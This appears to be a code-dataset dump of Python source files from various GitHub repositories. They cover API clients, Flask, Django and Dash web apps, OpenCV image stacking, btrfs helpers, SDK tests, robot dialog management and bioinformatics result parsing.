max_stars_repo_path
stringlengths
4
182
max_stars_repo_name
stringlengths
6
116
max_stars_count
int64
0
191k
id
stringlengths
7
7
content
stringlengths
100
10k
size
int64
100
10k
cloudrunner/api/base.py
CloudRunnerIO/cloudrunner
5
2168759
from copy import copy import json import logging import requests from exceptions import * # noqa logging.basicConfig() LOG = logging.getLogger("ApiClient") LOG.setLevel(logging.INFO) class ApiObject(object): @classmethod def _apify(cls, **kwargs): return ApiObject(**kwargs) def __init__(self, **kwargs): self._values = kwargs for k, v in kwargs.items(): if isinstance(v, dict): setattr(self, k, self._apify(**v)) elif isinstance(v, (list, set, tuple)): arr = [] for i in v: if isinstance(i, dict): arr.append(self._apify(**i)) else: arr.append(i) setattr(self, k, arr) else: setattr(self, k, v) @classmethod def type(cls): return getattr(cls, '_type', cls.__name__.lower()) class ReqMixin(object): def _request(self, method, path, *args, **kwargs): headers = copy(self.auth) if kwargs: headers.update(kwargs) if 'content_type' in headers: headers['Content-Type'] = kwargs["content_type"] else: headers['Content-Type'] = "application/json" try: full_path = "/".join([self.path, path]) LOG.debug("Sending request to %s [%s]" % (full_path, kwargs)) res = requests.request(method, full_path, data=json.dumps(kwargs), headers=headers) LOG.debug(res) if res.status_code == 401: raise NotAuthorized() if res.status_code == 302: raise NotModified() return res.json() except Exception, ex: LOG.exception(ex) return None class ResourceManager(ReqMixin): def __init__(self, path, models, wrapper=None, selector=None, suffix=None): self.app_path = path if isinstance(models, (set, list, tuple)): self.models = models self.mixed = True else: self.models = [models] self.mixed = False self.wrapper = wrapper self.selector = selector self.suffix = suffix def _unwrap(self, res): items = [] if self.mixed: tokens = self.wrapper.split(".") data = res for t in tokens: data = data[t] for model in self.models: _wrapper = getattr(model, 'wrapper', model.type()).lower() _wrapper = "%s%s" % (_wrapper, self.suffix) if _wrapper in data: for i in data[_wrapper]: items.append(model(**i)) else: _wrapper = self.wrapper or self.models[0].type() tokens = _wrapper.split(".") data = res for t in tokens: data = data[t] if isinstance(data, (set, list, tuple)): for item in data: items.append(self.models[0](**item)) else: return self.models[0](**data) return items def _get_selector(self, api): if self.selector: urlargs = str(getattr(api, self.selector)) if not urlargs: urlargs = getattr(api, 'id') or '' urlargs = str(urlargs) return urlargs def list(self, *args, **kwargs): res = self._request('get', '/'.join([self.app_path] + list(args)), **kwargs) items = [] items = self._unwrap(res) return items def item(self, *args, **kwargs): if args and isinstance(args[0], ApiObject): api = args[0] urlargs = self._get_selector(api) else: urlargs = "/".join(args) res = self._request('get', '/'.join([self.app_path, urlargs]), **kwargs) LOG.debug(res) items = [] items = self._unwrap(res) return items def add(self, model): res = self._request('post', self.app_path, **model._values) if res.get('success'): return True else: return "ERROR: " % res.get("error", {}).get("msg") def update(self, key, model): res = self._request( 'get', '/'.join([self.app_path, key]), **model._values) if res.get('success'): return True else: return "ERROR: " % res.get("error", {}).get("msg") def replace(self, key, model): res = self._request('put', '/'.join([self.path, key]), **model._values) if res.get('success'): return True else: return "ERROR: " % res.get("error", {}).get("msg") def remove(self, key): if isinstance(key, ApiObject): name = key.name else: name = key res = self._request('delete', '/'.join([self.app_path, name])) if res.get('success'): return True else: return "ERROR: %s" % res.get("error", {}).get("msg") _REST__subclasses = [] class RESTfulType(type): def __init__(cls, name, bases, dct): global __REST__subclasses if name == "RESTResource": cls._subclasses = _REST__subclasses else: for base in bases: if base.__name__ == "RESTResource": _REST__subclasses.append(cls) cls._resources = [] for k, v in dct.items(): if isinstance(v, ResourceManager): cls._resources.append(v) super(RESTfulType, cls).__init__(name, bases, dct) def __call__(cls, *args, **kwargs): obj = super(RESTfulType, cls).__call__(*args, **kwargs) return obj class RESTResource(ReqMixin): __metaclass__ = RESTfulType def __init__(self, auth=None, path=None): self.auth = auth self.path = path for res in self._resources: res.auth = self.auth res.path = self.path @classmethod def __subclasses__(cls): return self._subclasses
6,228
scripts/ais_nmea_uscg_timeshift.py
rolker/noaadata
35
2169536
#!/usr/bin/env python """Calculate the within minute slew of the USCG timestamp compared to the extended "T" time within the minute. I hope this comes from the receiver GPS time and not from AISLogger. Actually, this just shows that they all move together. I thought that this was done by the receiver, but no, it appears to be done by the java logging code. """ import datetime import sys import ais.ais_msg_1_handcoded as ais_msg_1 import ais.ais_msg_4_handcoded as ais_msg_4 from aisutils.uscg import uscg_ais_nmea_regex from aisutils import binary print '* emacs org-mode table' print '#+ATTR_HTML: border="1" rules="all" frame="all"' print '|USCG datetime| cg s | dt cg s | T | dT | t | S | slot t |', print 'msg slot num | msg slot t|msg hour| msg min | msg sec | MMSI |' all_keys = set() cg_s_prev = None time_of_arrival_prev = None for line in file(sys.argv[1]): line = line.rstrip() if len(line) < 5 or 'AIVDM' not in line: continue match = uscg_ais_nmea_regex.search(line).groupdict() cg_s = float(match['timeStamp']) uscg = datetime.datetime.utcfromtimestamp(float(match['timeStamp'])) if cg_s_prev is not None: dt = cg_s - cg_s_prev dt = '%5d' % dt else: dt = 'N/A'.rjust(5) cg_s_prev = cg_s try: time_of_arrival = float(match['time_of_arrival']) except: time_of_arrival = None if time_of_arrival is None: dt_time_of_arrival = 'N/A'.rjust(8) else: if time_of_arrival_prev is not None: dt_time_of_arrival = time_of_arrival - time_of_arrival_prev dt_time_of_arrival = '%8.4f' % dt_time_of_arrival else: dt_time_of_arrival = 'N/A'.rjust(8) time_of_arrival_prev = time_of_arrival try: slot_num = int(match['slot']) slot_t = slot_num / 2250. * 60 slot_t = '%5.2f' % slot_t except: slot_num = 'N/A' slot_t = 'N/A' print '|',uscg,'|',cg_s,'|',dt,'|',time_of_arrival,'|', dt_time_of_arrival,'|', match['t_recver_hhmmss'], '|',slot_num, '|',slot_t , '|', if match['body'][0] in ('1','2','3'): bits = binary.ais6tobitvec(match['body']) msg = ais_msg_1.decode(bits) #print msg.keys() #all_keys.update(set(msg.keys())) msg_slot = 'N/A' if 'slot_number' not in msg: msg['slot_number'] = 'N/A' msg['slot_time'] = 'N/A' else: msg['slot_time'] = msg['slot_number'] / 2250. * 60 if 'commstate_utc_hour' not in msg: msg['commstate_utc_hour'] = msg['commstate_utc_min'] = 'N/A' print '{slot_number}|{slot_time}|{commstate_utc_hour}|{commstate_utc_min}|{TimeStamp}|{UserID}|'.format(**msg) elif match['body'][0] == '4': bits = binary.ais6tobitvec(match['body']) msg = ais_msg_4.decode(bits) all_keys.update(set(msg.keys())) #print msg msg_slot = 'N/A' if 'slot_number' not in msg: msg['slot_number'] = 'N/A' msg['slot_time'] = 'N/A' else: msg['slot_time'] = msg['slot_number'] / 2250. * 60 #print '|',uscg,'|',cg_s,'|',dt,'|',time_of_arrival,'|', dt_time_of_arrival,'|', match['t_recver_hhmmss'], '|',slot_num, '|','%5.2f' % slot_t , '|', print '{slot_number}|{slot_time}|{Time_hour}|{Time_min}|{Time_sec}| b{UserID}|'.format(**msg) else: print '|'*6 pass #print all_keys
3,460
lib/fs_btrfs.py
hoefkensj/BTRWin
0
2170966
#!/usr/bin/env python import os def create_subv(parent,name): """ :param parent: :param name: :return: """ import btrfsutil subv=os.path.join(parent, name) btrfsutil.create_subvolume(subv) install_btrfs_subv_meta(subv) return subv def del_subv(parent,name): """ :param parent: :param name: :return: """ import btrfsutil subv=os.path.join(parent, name) deleted=btrfsutil.delete_subvolume(subv) return deleted def create_snapshot(parent,src,dst): """ :param parent: :param src: :param dst: :return: """ import btrfsutil subv_src=os.path.join(parent, src) subv_dst=os.path.join(parent, dst) btrfsutil.create_snapshot(subv_src,subv_dst) return def get_subvs(parent): """ :param parent: :return: """ import btrfsutil #ls_dirs=[os.path.join(parent, name) for name in os.listdir(parent) if os.path.isdir(os.path.join(parent, name))] return [directory for directory in os.listdir(parent) if btrfsutil.is_subvolume(directory)] def install_btrfs_subv_meta(subv): """ :param subv: :return: """ ini=os.path.join(subv, 'desktop.ini') dot=os.path.join(subv, '.directory') bang=os.path.join(subv, f'.!{subv.split("/")[-1].upper()}!.') with open(ini, 'w') as file: contents=f'[.ShellClassInfo]\r\nIconResource=C:\Windows\System32\SHELL32.dll,7' file.write(contents) with open(dot, 'w') as file: contents=f'[Desktop Entry]\nIcon=drive-partition' file.write(contents) with open(bang, 'w') as file: contents=f'# {subv.split("/")[-1].upper()}\n[Desktop Entry]\nIcon=drive-partition' file.write(contents)
1,550
demisto_sdk/tests/integration_tests/run_integration_test.py
kfirstri/demisto-sdk
0
2169954
import pytest from click.testing import CliRunner from demisto_client.demisto_api import DefaultApi from demisto_sdk.__main__ import main from demisto_sdk.commands.common.legacy_git_tools import git_path from demisto_sdk.commands.run_cmd.runner import Runner DEBUG_FILE_PATH = f'{git_path()}/demisto_sdk/commands/run_cmd/tests/test_data/kl-get-component.txt' YAML_OUTPUT = """arguments: [] name: kl-get-records outputs: - contextPath: Keylight.ID description: '' type: Number - contextPath: Keylight.Name description: '' type: String - contextPath: Keylight.ShortName description: '' type: String - contextPath: Keylight.SystemName description: '' type: String""" @pytest.fixture def set_environment_variables(monkeypatch): # Set environment variables required by runner monkeypatch.setenv('DEMISTO_BASE_URL', 'http://demisto.instance.com:8080/') monkeypatch.setenv('DEMISTO_API_KEY', 'API_KEY') monkeypatch.delenv('DEMISTO_USERNAME', raising=False) monkeypatch.delenv('DEMISTO_PASSWORD', raising=False) def test_integration_run_non_existing_command(mocker, set_environment_variables): """ Given - Non-existing command to run. - Debug and Verbose option to increase coverage When - Running `run` command. Then - Ensure output is the appropriate error. """ mocker.patch.object(DefaultApi, 'investigation_add_entries_sync', return_value=None) mocker.patch.object(Runner, '_get_playground_id', return_value='pg_id') result = CliRunner(mix_stderr=False, ).invoke(main, ['run', '-q', '!non-existing-command', '-D', '-v']) assert 0 == result.exit_code assert not result.exception assert 'Command did not run, make sure it was written correctly.' in result.output assert not result.stderr def test_json_to_outputs_flag(mocker, set_environment_variables): """ Given - kl-get-components command When - Running `run` command on it with json-to-outputs flag. Then - Ensure the json_to_outputs command is running correctly """ # mocks to allow the command to run locally mocker.patch.object(Runner, '_get_playground_id', return_value='pg_id') mocker.patch.object(Runner, '_run_query', return_value=['123']) # mock to get test log file mocker.patch.object(DefaultApi, 'download_file', return_value=DEBUG_FILE_PATH) # mock to set prefix instead of getting it from input command = '!kl-get-records' run_result = CliRunner(mix_stderr=False, ).invoke(main, ['run', '-q', command, '--json-to-outputs', '-p', 'Keylight', '-r']) assert 0 == run_result.exit_code assert not run_result.exception assert YAML_OUTPUT in run_result.stdout assert not run_result.stderr def test_json_to_outputs_flag_fail_no_prefix(mocker, set_environment_variables): """ Given - kl-get-components command When - Running `run` command on it with json-to-outputs flag and no prefix argument Then - Ensure the json_to_outputs command is failing due to no prefix argument provided. """ # mocks to allow the command to run locally mocker.patch.object(Runner, '_get_playground_id', return_value='pg_id') mocker.patch.object(Runner, '_run_query', return_value=['123']) # mock to get test log file mocker.patch.object(DefaultApi, 'download_file', return_value=DEBUG_FILE_PATH) # mock to set prefix instead of getting it from input command = '!kl-get-records' run_result = CliRunner(mix_stderr=False, ).invoke(main, ['run', '-q', command, '--json-to-outputs']) assert 1 == run_result.exit_code assert 'A prefix for the outputs is needed for this command. Please provide one' in run_result.stdout assert not run_result.stderr
3,794
hello.py
MockArch/bob_login_page
0
2170585
from flask import Flask, render_template, request, jsonify import atexit import cf_deployment_tracker import os import json from mongo import Conn # Emit Bluemix deployment event cf_deployment_tracker.track() app = Flask(__name__) port = int(os.getenv('PORT', 8000)) @app.route('/') def home(): return render_template('index.html') @app.route('/api/visitors', methods=['GET']) def get_visitor(): return jsonify(list(map(lambda doc: doc['name'], Conn().user_info.find({})))) @app.route('/api/visitors', methods=['POST']) def put_visitor(): user = request.json['name'] data = {'name':user} Conn().user_info.insert_one(data) return 'Hello %s! I added you to the database.' % user if __name__ == '__main__': app.run(host='0.0.0.0', port=port, debug=True)
794
OpenCV-Python/Basics/Joining_Multiple_Images_To_Display.py
mehulcparikh/ComputerVision
0
2169480
####################### STACKING USING THE FUNCTION ##################### import cv2 import numpy as np frameWidth = 640 frameHeight = 480 cap = cv2.VideoCapture(0) cap.set(3, frameWidth) cap.set(4, frameHeight) def stackImages(imgArray,scale,lables=[]): sizeW= imgArray[0][0].shape[1] sizeH = imgArray[0][0].shape[0] rows = len(imgArray) cols = len(imgArray[0]) rowsAvailable = isinstance(imgArray[0], list) width = imgArray[0][0].shape[1] height = imgArray[0][0].shape[0] if rowsAvailable: for x in range ( 0, rows): for y in range(0, cols): imgArray[x][y] = cv2.resize(imgArray[x][y], (sizeW, sizeH), None, scale, scale) if len(imgArray[x][y].shape) == 2: imgArray[x][y]= cv2.cvtColor( imgArray[x][y], cv2.COLOR_GRAY2BGR) imageBlank = np.zeros((height, width, 3), np.uint8) hor = [imageBlank]*rows hor_con = [imageBlank]*rows for x in range(0, rows): hor[x] = np.hstack(imgArray[x]) hor_con[x] = np.concatenate(imgArray[x]) ver = np.vstack(hor) ver_con = np.concatenate(hor) else: for x in range(0, rows): imgArray[x] = cv2.resize(imgArray[x], (sizeW, sizeH), None, scale, scale) if len(imgArray[x].shape) == 2: imgArray[x] = cv2.cvtColor(imgArray[x], cv2.COLOR_GRAY2BGR) hor= np.hstack(imgArray) hor_con= np.concatenate(imgArray) ver = hor if len(lables) != 0: eachImgWidth= int(ver.shape[1] / cols) eachImgHeight = int(ver.shape[0] / rows) print(eachImgHeight) for d in range(0, rows): for c in range (0,cols): cv2.rectangle(ver,(c*eachImgWidth,eachImgHeight*d),(c*eachImgWidth+len(lables[d][c])*13+27,30+eachImgHeight*d),(255,255,255),cv2.FILLED) cv2.putText(ver,lables[d][c],(eachImgWidth*c+10,eachImgHeight*d+20),cv2.FONT_HERSHEY_COMPLEX,0.7,(255,0,255),2) return ver while True: success, img = cap.read() kernel = np.ones((5,5),np.uint8) print(kernel) #path = "Resources/lena.png" #img = cv2.imread(path) imgGray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY) imgBlur = cv2.GaussianBlur(imgGray,(7,7),0) imgCanny = cv2.Canny(imgBlur,100,200) imgDilation = cv2.dilate(imgCanny,kernel , iterations = 2) imgEroded = cv2.erode(imgDilation,kernel,iterations=2) #imgBlank = np.zeros((200,200),np.uint8) StackedImages = stackImages(([img,imgGray,imgBlur], [imgCanny,imgDilation,imgEroded]),0.6) cv2.imshow("Staked Images", StackedImages) if cv2.waitKey(1) & 0xFF == ord('q'): break ################### Stacking images without Function ################ # import cv2 # import numpy as np # img1 = cv2.imread('../Resources/lena.png',0) # img2 = cv2.imread('../Resources/land.jpg') # print(img1.shape) # print(img2.shape) # img1 = cv2.resize(img1, (0, 0), None, 0.5, 0.5) # img2 = cv2.resize(img2, (0, 0), None, 0.5, 0.5) # img1 = cv2.cvtColor(img1, cv2.COLOR_GRAY2BGR) # hor= np.hstack((img1, img2)) # ver = np.vstack((img1, img2)) # cv2.imshow('Vertical', ver) # cv2.imshow('Horizontal', hor) # cv2.waitKey(0)
3,209
sales/migrations/0013_auto_20200919_1519.py
zhou-en/turf_portal
0
2170642
# Generated by Django 3.1.1 on 2020-09-19 15:19 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('sales', '0012_order_closed_date'), ] operations = [ migrations.AddField( model_name='buyer', name='status', field=models.CharField(choices=[('ACTIVE', 'Active'), ('INACTIVE', 'Inactive')], default='ACTIVE', max_length=255), ), migrations.AlterField( model_name='order', name='status', field=models.CharField(choices=[('DRAFT', 'Draft'), ('SUBMITTED', 'Submitted'), ('INVOICED', 'Invoiced'), ('DELIVERED', 'Delivered'), ('CLOSED', 'Closed')], default='DRAFT', max_length=255), ), ]
761
App-Launcher/lib/dialog_manager.py
SoftBankRoboticsEurope/app-launcher
4
2164356
# -*- coding: utf-8 -*- import qi class DialogManager: _LANGUAGE_FORMAT_CONVERSION = dict(en_US="enu", fr_FR="frf", ja_JP="jpj", zh_CN="mnc", es_ES="spe", de_DE="ged", ko_KR="kok", it_IT="iti", nl_NL="dun", fi_FI="fif", pl_PL="plp", ru_RU="rur", tr_TR="trt", ar_SA="arw", cs_CZ="czc", pt_PT="ptp", pt_BR="ptb", sv_SE="sws", da_DK="dad", nn_NO="nor", el_GR="grg") def __init__(self, logger, session, pref_manager, pages_definition_property, autonomous_enabled_property, current_page_property): self._logger = logger self._session = session self._logger.info("@ Creating Dialog manager...") self._pref_manager = pref_manager self._pages_definition = pages_definition_property self._current_language = None self._current_language_dlg = None self._current_page = current_page_property self._autonomous_enabled = autonomous_enabled_property self._connection_pagedef = self._pages_definition.connect(self._create_pages_triggers_dialog) self._session.waitForService("ALTextToSpeech") self._tts = self._session.service("ALTextToSpeech") self._on_language_changed(self._tts.locale()) self._con_language = self._tts.languageTTS.connect(self._on_language_changed) qi.async(self._create_pages_triggers_dialog, self._pages_definition.value(), delay=1000000) self._pref_dialog_always_running = self._pref_manager.get_value('dialogAlwaysRunning', True) self.connection_autoena = self._autonomous_enabled.connect(self._on_autonomous_enabled_changed) self._session.waitForService("ALMemory") self.page_subscriber = self._session.service("ALMemory").subscriber("AppLauncher/PageRequired") self.page_connection = self.page_subscriber.signal.connect(self.on_page_required) self._logger.info("@ Dialog manager created!") def cleanup(self): self._logger.info("@ Cleaning dialog manager...") try: self._tts.languageTTS.disconnect(self._con_language) self.page_subscriber.signal.disconnect(self.page_connection) self._pages_definition.disconnect(self._connection_pagedef) self._autonomous_enabled.disconnect(self.connection_autoena) except Exception as e: self._logger.info("@ Error while cleaning dialog manager: {}".format(e)) self._logger.info("@ Dialog manager is clean!") def _create_pages_triggers_dialog(self, pages_definition): self._logger.info("@ Updating dialog concept for pages") page_name_list = [] for page_id in pages_definition.keys(): page_name = pages_definition[page_id]["title"] page_name_list.append(page_name) self._session.waitForService("ALDialog") dialog = self._session.service("ALDialog") dialog.setConcept("applauncher_pages_names", self._current_language_dlg, page_name_list) self._logger.info("@ Pages are: {}".format(page_name_list)) def _on_language_changed(self, new_language): self._logger.info("@ Language is now: {}".format(new_language)) self._current_language_pkg = new_language self._current_language_dlg = self._LANGUAGE_FORMAT_CONVERSION[self._current_language_pkg] def _on_autonomous_enabled_changed(self, enabled): try: forbidden = True life = self._session.service("ALAutonomousLife") if enabled: forbidden = False self._logger.info("@ Autonomous: {} (forbidden: {})".format(enabled, forbidden)) life._forbidAutonomousInteractiveStateChange(forbidden) if forbidden: self._stop_dialog() else: self._start_dialog() except Exception as e: self._logger.info("@ Error while changing automous mode: {}".format(e)) def _start_dialog(self): try: if self._pref_dialog_always_running: self._logger.info("@ dialogAlwaysRunning: True -> starting dialog") life = self._session.service("ALAutonomousLife") mem = self._session.service("ALMemory") mem.insertData("Dialog/DoNotStop", 1) life.switchFocus("run_dialog_dev/.") except Exception as e: self._logger.error("@ Run dialog error: " + str(e)) def _stop_dialog(self): try: bm = self._session.service("ALBehaviorManager") bm.stopBehavior("run_dialog_dev/.") except Exception as e: self._logger.error("@ Stop dialog error: " + str(e)) def on_page_required(self, page_request): if page_request == "homepage": self._current_page.setValue("Home") return list_page = self._pages_definition.value() for page_id in list_page.keys(): if page_request in list_page[page_id]["title"]: self._current_page.setValue(page_id) return
5,187
nomadgram/images/views.py
zlyanz13/Yonwongram
0
2170189
from rest_framework.views import APIView from rest_framework.response import Response from rest_framework import status from . import models, serializers from nomadgram.users import models as user_models from nomadgram.locations import models as location_models from nomadgram.users import serializers as user_serializers # Create your views here. class Images(APIView): def get(self, request, format=None): user = request.user following_users = user.following.all() image_list = [] for following_user in following_users: user_images = following_user.images.all()[:2] for image in user_images: image_list.append(image) my_images = user.images.all()[:2] for image in my_images: image_list.append(image) sorted_list = sorted(image_list, key =lambda image: image.created_at, reverse= True) serializer = serializers.ImageSerializer(sorted_list, many = True, context={'request' : request}) return Response(serializer.data) def post(self, request, format=None): user = request.user data = request.data print(data) station_nm = data.get("station") location = data.get("location") stars = int('0'+data.get("stars")) caption = data.get("caption") tags = data.get("tags") file = data.get("file") try : found_location = location_models.Location.objects.get( station__station_nm = station_nm, name=location) print('location fount',found_location) except location_models.Location.DoesNotExist: station=location_models.Station.objects.filter(station_nm = station_nm).order_by('line_num')[0] new_location=location_models.Location.objects.create( name=location, station = station) models.Image.objects.create(file= file,location = new_location, stars=stars, tags=tags, caption=caption, creator=user) return Response(None, status= status.HTTP_201_CREATED) """user = request.user serializer = serializers.InputImageSerializer(data=request.data) if serializer.is_valid(): serializer.save(creator = user) return Response(data = serializer.data, status= status.HTTP_201_CREATED) else : return Response(data = serializer.errors, status=status.HTTP_400_BAD_REQUEST)""" class LikeImage(APIView): def get(self, request, image_id, format= None): likes = models.Like.objects.filter(image__id=image_id) like_creator_ids = likes.values('creator_id') users = user_models.User.objects.filter(id__in = like_creator_ids)#id__in mean search inside a Array serializer = user_serializers.ListUserSerializer(users, many=True, context={"request": request}) return Response(data =serializer.data, status= status.HTTP_200_OK) def post(self, request, image_id, format = None): user = request.user try: found_image = models.Image.objects.get(id=image_id) except models.Image.DoesNotExist: return Response(status=404) try : preexisting_like = models.Like.objects.get( creator = user, image = found_image ) return Response(status=status.HTTP_304_NOT_MODIFIED) except models.Like.DoesNotExist: new_like = models.Like.objects.create( creator = user, image = found_image ) new_like.save() return Response(status = status.HTTP_200_OK) class UnLikeImage(APIView): def delete(self, request, image_id, format = None) : user = request.user try: found_image = models.Image.objects.get(id=image_id) except models.Image.DoesNotExist: return Response(status=status.HTTP_404_NOT_FOUND) try : preexisting_like = models.Like.objects.get( creator = user, image = found_image ) preexisting_like.delete() return Response(status = status.HTTP_204_NO_CONTENT) except models.Like.DoesNotExist: return Response(status=status.HTTP_304_NOT_MODIFIED) class CommentOnImage(APIView): def post(Self, request, image_id, format = None) : user = request.user try: found_image = models.Image.objects.get(id=image_id) except models.Image.DoesNotExist: return Response(status=404) serializer = serializers.CommentSerializer(data=request.data) if serializer.is_valid(): serializer.save(creator=user, image = found_image) return Response(data=serializer.data, status =201) else: return Response(data = serializer.errors, status = 400) class Comment(APIView): def delete(Self, request, comment_id, format = None): try: comment = models.Comment.objects.get(id=comment_id, creator=request.user) comment.delete() return Response(status=204) except models.Comment.DoesNotExist : return Response(status=404) class Search(APIView): def get(self, request, format=None): hashtags = request.query_params.get('hashtags', None) if hashtags is not None : hashtags = hashtags.split(",") images = models.Image.objects.filter(tags__name__in = hashtags).distinct() serializer = serializers.ImageSerializer(images, many=True, context={'request' : request}) return Response(data = serializer.data, status= status.HTTP_200_OK) else : images = models.Image.objects.all()[:20] serializer = serializers.ImageSerializer(images, many=True, context={'request' : request}) return Response(data = serializer.data, status= status.HTTP_200_OK) class ModerateComment(APIView): def delete(self, request, image_id, comment_id, format=None): user = request.user try : comment_to_delete = models.Comment.objects.get(id=comment_id, image__id = image_id, image__creator= user) comment_to_delete.delete() except models.Comment.DoesNotExist : return Response(status= status.HTTP_404_NOT_FOUND) return Response(status = status.HTTP_204_NO_CONTENT) class ImageDetail(APIView): def find_own_image(self, image_id, user): try: image = models.Image.objects.get(id=image_id, creator = user) return image except models.Image.DoesNotExist : return None def get(self, request, image_id, format =None ): try : image = models.Image.objects.get(id=image_id) except models.DoesNotExist : return Response(status= status.HTTP_404_NOT_FOUND) serializer = serializers.ImageSerializer(image, context={'request' : request}) return Response(serializer.data, status=status.HTTP_200_OK) def put(self, request, image_id, format = None): user = request.user image = self.find_own_image(image_id, user) if image is None : return Response(status= status.HTTP_400_BAD_REQUEST) serializer = serializers.InputImageSerializer(image, data = request.data, partial = True ) if serializer.is_valid(): serializer.save(creator = user) return Response(data = serializer.data, status= status.HTTP_204_NO_CONTENT) else : return Response(data = serializer.errors, status = status.HTTP_400_BAD_REQUEST) def delete(self, request, image_id, format=None): user = request.user image = self.find_own_image(image_id, user) if image is None : return Response(status= status.HTTP_400_BAD_REQUEST) image.delete() return Response(status=status.HTTP_204_NO_CONTENT) """ def get_key(image): return image.created_at class ListAllImages(APIView): def get(self, request, format=None): all_images = models.Image.objects.all() serializer = serializers.ImageSerializer(all_images, many = True) return Response(data = serializer.data) class ListAllComments(APIView): def get(self, request, format = None): user_id = request.user.id all_comments = models.Comment.objects.filter(creator = user_id) serializer = serializers.CommentSerializer(all_comments, many = True) return Response(data = serializer.data) class ListAllLikes(APIView): def get(self, request, format = None): all_likes = models.Like.objects.all() serializer = serializers.LikeSerializer(all_likes, many = True) return Response(data = serializer.data) """
9,270
settings.py
epictaco302/epictacos-website
0
2170172
# Default settings file for the website PORT = 80 ENABLE_HTTPS = False ENABLE_LOGGING = False SERVE_STATIC = False SERVE_STORAGE = False CERT_DIR = 'path/to/cert' CERT_ROOT = 'CERT_ROOT' TARGET_HOST = 'hiden.ooguy.com' # Import settings from settings_local.py. If settings_local.py is not present, terminate try: from settings_local import * except ImportError: raise Exception("Please create settings_local.py")
429
network.py
rebeling/networking
1
2168799
#!/usr/bin/env python # -*- coding: utf-8 -*- import os import json from graph import marathon_graph from marathon import MarathonClient def generate_network_graph(): """ 1. connect to client, vpn must be on 2. transform martahon app list into networkx graph 3. save graph to file 4. serve the graph with d3 frontend """ from secrets import USERNAME, PASSWORD, MARATHON_URL mc = MarathonClient(MARATHON_URL, username=USERNAME, password=PASSWORD) print "Initilized {}\niterating apps...".format(mc) result = marathon_graph(mc.list_apps()) result["MARATHON_URL"] = MARATHON_URL filename = 'graphFile.json' with open('visualization/{}'.format(filename), 'w') as f: json.dump(result, f, indent=4) print "Done." if __name__ == "__main__": generate_network_graph()
835
mz-funnel-chart-plotly/dash/app.py
dunithd/edu-samples
9
2170096
import psycopg2 import pandas.io.sql as sqlio import pandas as pd import dash from dash import dcc from dash import html import plotly.express as px app = dash.Dash(__name__) # Connect to Materialize as a regular database conn = psycopg2.connect("dbname=materialize user=materialize port=6875 host=localhost") # Read the materialized view with Pandas sql = "select * from consolidated_funnel order by cnt desc;" df = pd.read_sql_query(sql, conn) # Plot a funnel chart fig = px.funnel(df, x="step", y="cnt") # Main UI scaffolding for the dashboard app.layout = html.Div(children=[ html.H1(children='Conversion Funnel'), html.Div(children=''' Dash: A web application framework for your data. '''), dcc.Graph( id='funnel-chart', figure=fig ) ]) if __name__ == '__main__': app.run_server(debug=True) conn = None
866
scripts/displacement.py
Psirus/altay
0
2170395
import os import sys sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..'))) from altai.lib import driver_database from altai.lib import vented_box from altai.lib import speaker import matplotlib.pyplot as plt import numpy as np driver_db = driver_database.DriverDB.from_file('../altai/lib/driver_db.json') driver = driver_db[0] box = vented_box.VentedBox(Vab=90.0, fb=40.0, Ql=20.0) speaker = speaker.VentedSpeaker(driver, box) freqs, displacement = speaker.displacement() plt.semilogx(freqs, displacement) plt.show()
549
RFACA/foldx/foldx_results.py
JinyuanSun/my_bio_script
0
2169824
#!/usr/bin/python #By <NAME> and <NAME>, 2021 import pandas as pd import argparse parser = argparse.ArgumentParser(description= 'Process files from previous foldx scan') parser.add_argument("-sn", '--subdirnum', help="Total number of subdirectories") parser.add_argument("-fn", '--fxoutname', help="Average_BuildModel_<pdbfilename>.fxout") parser.add_argument("-c", '--cutoff',help="Cutoff of ddg") args = parser.parse_args() fxoutname = args.fxoutname subnum = int(args.subdirnum) cutoff = int(args.cutoff) df_average_lst = [] for num in range(subnum): num += 1 fxout_name = "Subdirectory"+str(num)+"/"+fxoutname df_average = pd.read_table(fxout_name, sep='\t',skiprows=8) df_average_lst.append(df_average) df_list_lst = [] for num in range(subnum): num += 1 list_name = "test/Subdirectory"+str(num)+"/List_Mutations_readable.txt" df_list = pd.read_table(list_name, sep=" ",header=None) df_list_lst.append(df_list) df_average_all = pd.concat(df_average_lst, axis=0, ignore_index=True) #df_average.head() df_list_all = pd.concat(df_list_lst, axis=0, ignore_index=True) df_o = df_average_all.iloc[:, 0:3].join(df_list_all) odict = {'mutation':[],'energy':[],'SD':[],'position':[]} for i in range(df_o.shape[0]): odict['mutation'].append(str(df_o[1][i])+str(df_o[2][i])+str(df_o[3][i])) odict['position'].append(str(df_o[2][i])) odict['energy'].append(df_o['total energy'][i]) odict['SD'].append(df_o['SD'][i]) CompleteList_df = pd.DataFrame(odict) CompleteList_SortedByEnergy_df = CompleteList_df.sort_values('energy').reset_index(drop=True) def BetsPerPosition(df): position_list = [] length = df.shape[0] for i in range(length): if df['position'][i] in position_list: df = df.drop(index=i) else: position_list.append(df['position'][i]) return df.reset_index(drop=True) def BelowCutOff(df,cutoff): #position_list = [] length = df.shape[0] for i in range(length): if float(df['energy'][i]) > float(cutoff): df = df.drop(index=i) else: continue return df.reset_index(drop=True) BestPerPosition_SortedByEnergy_df = BetsPerPosition(CompleteList_SortedByEnergy_df) BestPerPosition_df = BetsPerPosition(CompleteList_SortedByEnergy_df) BelowCutOff_df = BelowCutOff(CompleteList_df,-1) BelowCutOff_SortedByEnergy_df = BelowCutOff(CompleteList_SortedByEnergy_df,-1) BestPerPositionBelowCutOff_SortedByEnergy_df = BelowCutOff(BestPerPosition_SortedByEnergy_df,-1) BestPerPositionBelowCutOff_df = BelowCutOff(BestPerPosition_df,-1) def variablename(var): import itertools return [tpl[0] for tpl in filter(lambda x: var is x[1], globals().items())] def out_tab_file(df): df_name = variablename(df)[0] filename = "MutationsEnergies_"+df_name[:-3]+".tab" with open(filename,"w+") as of: of.write(BestPerPositionBelowCutOff_df.to_csv(columns=['mutation', 'energy', 'SD'], sep='\t', index=False)) of.close() out_tab_file(CompleteList_df) out_tab_file(CompleteList_SortedByEnergy_df) out_tab_file(BestPerPosition_SortedByEnergy_df) out_tab_file(BestPerPosition_df) out_tab_file(BelowCutOff_df) out_tab_file(BelowCutOff_SortedByEnergy_df) out_tab_file(BestPerPositionBelowCutOff_SortedByEnergy_df) out_tab_file(BestPerPositionBelowCutOff_df)
3,403
utils/fasttext_utils.py
samujjwaal/multilingual-chatbot
0
2169248
